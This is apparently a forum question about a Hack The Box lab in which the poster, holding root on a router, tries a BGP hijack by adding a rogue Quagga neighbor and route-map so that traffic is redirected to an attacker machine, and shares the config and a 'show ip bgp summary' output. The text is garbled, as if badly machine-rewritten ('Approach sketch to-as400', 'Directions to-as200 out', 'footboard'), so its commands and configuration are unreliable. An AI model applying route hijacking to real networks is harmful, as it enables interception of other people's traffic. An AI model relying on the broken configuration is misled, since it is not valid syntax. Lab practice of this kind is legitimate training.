I'm working on an exercise that attacks BGP configurations on a HTB machine to track traffic to a specific machine.
I have root access to the original computer and am now trying to configure the relevant routes to direct the traffic to me.
I understand BGP hijacking so that I need to create a new AS with a simpler route so traffic will be routed to me.
Based on this assumption I tried to add my machine as
AS4 As well as my IP address for the local route table, I set up Wireshark on my attacker and listened to the traffic.
In the following, I changed that
AS300 AS is what I aim for.
! Zebra configuration saved before vty
! 2018/07/02 02:14:27
route-map to-as200 allows 10
route-map to-as300 allow 10
Approach sketch to-as400 allow 10
Router BGP 100
bgp router-id 10.255.255.1
Neighbor 10.78.10.2 Remote as 200
Neighbor 10.78.11.2 Remote as 300
Neighbor 10.78.10.2 Directions to-as200 out
Neighbor 10.78.11.2 Approach to-as300 off
Neighbor my_ip remote-as 300
neighbor my_ip route-map to-as300
Route added on footboard …
root @ victim: ~ # ip route add my_ip dev eth2 proto zebra
ip route add my_ipdev eth2 proto zebra
I can see that I will be added when I check in
vtysh but there seems to be no activity there or in my Wireshark.
Did I either misunderstand what to do or is my process just wrong?
r1 # show ip bg summary
show ip bg summary
BGP router ID 10.255.255.1, local AS number 100
RIB entries 54 using 6048 bytes of memory
Peers 3 with 13 KB memory
Neighbor V AS MsgRcvd MsgSent TblVer InQ OutQ Up / Down Status / PfxRcd
my_ip 4 300 0 0 0 0 0 never active
10.78.10.2 4 200 7 11 0 0 0 00:02:27 22
10.78.11.2 4 300 6 10 0 0 0 00:02:30 22
Total number of neighbors 3